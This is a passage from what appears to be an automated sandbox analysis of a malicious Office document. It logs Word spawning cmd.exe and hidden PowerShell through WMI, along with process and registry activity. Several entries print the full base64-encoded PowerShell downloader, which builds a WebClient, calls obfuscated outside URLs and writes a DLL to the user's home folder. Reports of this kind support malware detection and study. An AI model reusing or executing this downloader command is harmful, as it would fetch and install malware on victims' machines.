AAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_000007FF00281ADC pushad ; ret

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
